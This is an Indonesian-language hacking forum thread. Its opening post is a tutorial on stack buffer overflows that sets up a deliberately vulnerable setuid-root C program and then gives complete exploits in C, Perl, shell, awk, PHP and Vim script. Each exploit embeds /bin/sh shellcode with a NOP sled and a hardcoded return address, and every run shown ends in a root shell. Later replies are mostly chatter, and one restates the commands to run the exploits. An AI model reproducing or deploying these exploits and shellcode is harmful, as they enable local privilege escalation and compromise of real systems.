| exploit overflow with C++ | |
|
+7rezagms EA Ngel exnome s4va bL4Ck_3n91n3 cr4wl3r doniskynet 11 posters |
Pengirim | Message |
---|
doniskynet Newbie
Jumlah posting : 18 Join date : 14.05.08 Lokasi : Skynet Corporation
| Subyek: exploit overflow with C++ Thu May 22, 2008 7:33 pm | |
| Overflow exploits are not only compiled by C. Instead, they can be compiled by almost any programming language. The examples in this article are tested on Linux and demonstrated by overflow exploits compiled by C, Perl, Shell and Awk. The reason for this choice is that almost all these languages are bundled with Unix (except for C in commercial Unix systems).
In the following examples accurate location is implemented basically by placeing SHELLCODE to environment variables.
<1> vul.c that is vulnerable to overflow
[cloud@test]$ id uid=505(cloud) gid=503(test) groups=503(test) [cloud@test]$ cat vul.c /* Demo Have a bof vul at argv[1]. Write by watercloud @ xfocus.org */ #include<stdio.h> int main(int argc,char * argv[]) { char buff[32]; if(argc > 1) { strcpy(buff,argv[1]); } printf("buff : %s\n",buff); return 0; } [cloud@test]$ gcc vul.c -o vul [cloud@test]$ ls -l vul -rwxr-xr-x 1 cloud test 11627 2月 24 10:14 vul [cloud@test]$ sudo chown root vul [cloud@test]$ sudo chmod u+s vul [cloud@test]$ ls -lh vul -rwsr-xr-x 1 root test 11K 2月 24 10:14 vul
<2> C exploit ex.c
[cloud@test]$ cat ex.c /* Demo for exploit bof of "./vul" Write by watercloud @ xfocus.org */ #include <stdio.h> #define TARGET "./vul" #define ADDR 0xbffff3e8 char SH[]="1\xc0PPP[YZ4\xd0\xcd\x80" "j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; int main(int argc,char * argv[]) { char env_buff[4000]; char cmd_buff[1024]; int i,ret; unsigned int *pi; char * pc;
for(i=0;i<3096;env_buff[i++]=0x90){ }; env_buff[i]='\0'; strcat(env_buff,SH); setenv("KK",env_buff,1); strcpy(cmd_buff,TARGET); pc=&cmd_buff[strlen(TARGET)]; *pc++=' '; for(ret=1,i=0;i<4 && ret;i++) { int j; *pc++='A'; pi=(unsigned int *)pc; for(j=0;j<20;*pi++=ADDR,j++){}; *pi=0; ret=system(cmd_buff); } return ret;
} [cloud@test]$ gcc ex.c -o ex [cloud@test]$ ./ex buff : A梵胯?胯?胯?胯 ?胯?胯?胯?胯?梵胯?? buff : AA梵胯?胯?胯?胯?&# 33007;?胯?胯?胯胯?胯??buff : AAA& #26805;胯?胯?胯?胯?胯?! 007;?胯?胯胯?胯?? buff : AAAA梵胯?胯?胯?胯?& #33007;?胯?胯?胯 ?胯?胯?? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit
<3> perl exploit ex.pl
[cloud@test]$ cat ex.pl
#!/usr/bin/perl # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org
#$ENV_LEN=`env |wc -c` $SHELL="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; $ENV{KK}= "\x90"x 3096 . $SHELL; for($ret=1,$ag="AA",$i=0;$i<4 && $ret; $ag="A"x $i++) { $ret=system "./vul",$ag. "\xff\xbf\xe8\xf3"x20; #ADDR:0xbffff3e8 } #EOF [cloud@test]$ perl ex.pl buff : AA胯?胯?胯?胯?胯?胯? 胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯?胯?胯?胯?胯? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit
<4> Shell exploit ex.sh
[cloud@test]$ cat ex.sh #/bin/bash # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org
#ENV_LEN=`env |wc -c|tr -d ' '` SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096 for((i=0;i<20;i++));do AD=$AD"\xff\xbf\xe8\xf3";done #ADDR:0xbffff3e8 export AGSHELL=$AG`echo -e $SH`
for((i=0;i<4;i++)) ;do AA=$AA"A" if ./vul $AA`echo -e $AD` then break fi done #EOF [cloud@test]$ chmod a+x ex.sh [cloud@test]$ ./ex.sh buff : A胯?胯?胯?胯?胯?胯 ?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯?胯?胯?胯?胯?./ex.sh: line 16: 5287 段错误 ./vul $AA`echo -e $AD` buff : AA胯?胯?胯?胯?胯?胯? 胯?胯?胯?胯?胯?胯?胯?胯? 胯?胯?胯?胯?胯?胯? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit
<5> awk exploit ex.awk
[cloud@test]$ cat ex.awk # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org
BEGIN{ SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; AG="AA"; for ( i=0;i<10;i++) { AG=AG""AG; } AG=AG""AG""AG #3096 for(i=0;i<20;i++) { AD=AD"\xe8\xf3\xff\xbf"; #ADDR:0xbffff3e8 }
AA="AA" for(i=0;i<4;i++) { AA=AA"A" system("./vul "AA""AD" "AG""SH) } } #EOF [cloud@test]$ gawk -f ex.awk /dev/null buff : AAA梵胯?胯?胯?胯?胯 ?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯?胯?胯?胯?胯??buff : AAAA梵 ;胯?胯?胯?胯?胯?胯?胯?& #33007;?胯?胯?胯?胯?胯?胯?胯?&# 33007;?胯?胯?胯?? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b#
<6> PHP exploit
[cloud@MagicLinux tmp]$ id uid=502(cloud) gid=502(cloud) groups=502(cloud) [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x 1 root root 4895 2月 26 20:57 vul [cloud@MagicLinux tmp]$ cat ex.php <?php $SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"; $AG="AA"; for( $i=0;$i<10;$i++){ $AG.=$AG; } $AG.=$AG.$AG; #3096
for($i=0;$i<20;$i++) { $AD.="\xff\xbf\xe8\xf3";#ADDR:0xbffff3e8 } for($i=0;$i<4;$i++) { $AA.="A"; print system("./vul ".$AA.$AD.$AG.$SH); } ?> [cloud@MagicLinux tmp]$ php ex.php 1>/dev/null id >&2 uid=0(root) gid=502(cloud) groups=502(cloud) exit [cloud@MagicLinux tmp]$
<7> Vim extension script exploit
Even extension programming script of vim compiler can be used to write an overflow exploit.
[cloud@MagicLinux tmp]$ id uid=502(cloud) gid=502(cloud) groups=502(cloud) [cloud@MagicLinux tmp]$ cat ex.vim let SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80" let AG="AA" let i=0 while(i<10) let AG=AG.AG let i=i+1 endwhile let AG=AG.AG.AG "len of AG is 3096
let AD="" let i=0 while(i<20) let AD=AD."\xff\xbf\xe8\xf3" "ADDR:0xbffff3e8 let i=i+1 endwhile
let AA="" let i=0 while(i<4) let AA=AA."A" execute "!./vul ". AA . AD . AG . SH let i=i+1 endwhile [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x 1 root root 4895 2月 26 20:57 vul [cloud@MagicLinux tmp]$ vim -eS ex.vim Xlib: connection to ":0.0" refused by server Xlib: No protocol specified
buff : A�胯�胯�胯�胯 �胯�胯�胯�胯� 胯�胯�胯�胯�胯 �胯�胯�胯�胯� 胯�胯�胯 驛AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA… …………………………… ……………………………… …… AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1繮PP[YZ4型�jX橰 hn/shh//biT[RSTY蛝sh-2.05b# id uid=0(root) gid=502(cloud) groups=502(cloud) sh-2.05b#
<8> ......
<9> Summary
The basis of overflow is address location, usage of data structure such as heap, and architechure the organization/OS is running on. Knowing these we can understand that overflow exploit itself is unrelated to programming language. | |
|
| |
cr4wl3r I'am Not Hacker
Jumlah posting : 373 Join date : 18.04.08 Age : 38 Lokasi : In Your Mind
| Subyek: Re: exploit overflow with C++ Tue Jun 10, 2008 8:21 am | |
| ini yg qt da cari dari dulu, thank's bro | |
|
| |
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| Subyek: Re: exploit overflow with C++ Tue Jun 10, 2008 10:08 pm | |
| ntu buat apa sih? maklum newbie... soalnya bahasanya aneh... | |
|
| |
s4va Lamer
Jumlah posting : 60 Join date : 18.04.08 Age : 37 Lokasi : di hati tiap umat-Nya
| Subyek: Re: exploit overflow with C++ Tue Jun 10, 2008 11:31 pm | |
| | |
|
| |
cr4wl3r I'am Not Hacker
Jumlah posting : 373 Join date : 18.04.08 Age : 38 Lokasi : In Your Mind
| Subyek: Re: exploit overflow with C++ Wed Jun 11, 2008 6:24 am | |
| itu dibikin lewat bahasa C++ untuk menguasainya minimal haru bisa C++ sama assembly | |
|
| |
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| Subyek: Re: exploit overflow with C++ Wed Jun 11, 2008 6:43 am | |
| | |
|
| |
exnome Script Kiddies
Jumlah posting : 157 Join date : 15.05.08 Age : 38 Lokasi : Belakang Proxy
| |
| |
exnome Script Kiddies
Jumlah posting : 157 Join date : 15.05.08 Age : 38 Lokasi : Belakang Proxy
| Subyek: Re: exploit overflow with C++ Thu Jun 12, 2008 12:14 am | |
| tuh cara pkenya : - Code:
-
1.vul.c that is vulnerable to overflow [cloud@test]$ gcc vul.c -o vul [cloud@test]$ ls -l vul -rwxr-xr-x 1 cloud test 11627 2月 24 10:14 vul [cloud@test]$ sudo chown root vul [cloud@test]$ sudo chmod u+s vul [cloud@test]$ ls -lh vul -rwsr-xr-x 1 root test 11K 2月 24 10:14 vul
2. C exploit ex.c [cloud@test]$ gcc ex.c -o ex [cloud@test]$ ./ex
3. perl exploit ex.pl [cloud@test]$ perl ex.pl
4. Shell exploit ex.sh [cloud@test]$ chmod a+x ex.sh [cloud@test]$ ./ex.sh
5. awk exploit ex.awk [cloud@test]$ gawk -f ex.awk /dev/null
6. PHP exploit [cloud@MagicLinux tmp]$ php ex.php 1>/dev/null id >&2 uid=0(root) gid=502(cloud) groups=502(cloud) exit [cloud@MagicLinux tmp]$
7.Vim extension script exploit [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x 1 root root 4895 2月 26 20:57 vul [cloud@MagicLinux tmp]$ vim -eS ex.vim
| |
|
| |
EA Ngel Lamer
Jumlah posting : 53 Join date : 13.05.08
| Subyek: Re: exploit overflow with C++ Thu Jul 03, 2008 4:23 am | |
| ke ingat ama teknik hackingnya Xnuser | |
|
| |
rezagms Newbie
Jumlah posting : 42 Join date : 27.06.08 Lokasi : GadA
| Subyek: donie copas >.< Sat Jul 12, 2008 5:06 pm | |
| jurus cop [as]
Hoa Hoa Hoa Hoaeeemmm... >,< | |
|
| |
d3w0 Lamer
Jumlah posting : 55 Join date : 03.05.08
| Subyek: Re: exploit overflow with C++ Sun Jul 13, 2008 10:21 am | |
| wedew master2 ni..... atut............. kabooooooooor | |
|
| |
funky_shensey Admin
Jumlah posting : 356 Join date : 07.05.08 Lokasi : gorontalo
| Subyek: Re: exploit overflow with C++ Sun Jul 13, 2008 10:37 am | |
| uiih master apaan tuuhhh bener2 mumet | |
|
| |
cYb3r_jOk3 Script Kiddies
Jumlah posting : 232 Join date : 12.05.08 Age : 36 Lokasi : mAlaNk jAWatiMUr
| Subyek: Re: exploit overflow with C++ Mon Jul 14, 2008 3:40 am | |
| | |
|
| |
exnome Script Kiddies
Jumlah posting : 157 Join date : 15.05.08 Age : 38 Lokasi : Belakang Proxy
| Subyek: Re: exploit overflow with C++ Sun Jul 20, 2008 6:41 pm | |
| | |
|
| |
funky_shensey Admin
Jumlah posting : 356 Join date : 07.05.08 Lokasi : gorontalo
| Subyek: Re: exploit overflow with C++ Mon Jul 21, 2008 4:43 am | |
| | |
|
| |
exnome Script Kiddies
Jumlah posting : 157 Join date : 15.05.08 Age : 38 Lokasi : Belakang Proxy
| Subyek: Re: exploit overflow with C++ Mon Jul 21, 2008 9:08 pm | |
| | |
|
| |
saint Script Kiddies
Jumlah posting : 157 Join date : 22.05.08 Age : 39 Lokasi : Neraka Bagian Timur
| Subyek: Re: exploit overflow with C++ Thu Aug 28, 2008 12:06 am | |
| set dah C++ gw ada CD tutorialnya nih,tp ampe detik ini gw g ngerti | |
|
| |
Sponsored content
| Subyek: Re: exploit overflow with C++ | |
| |
|
| |
| exploit overflow with C++ | |
|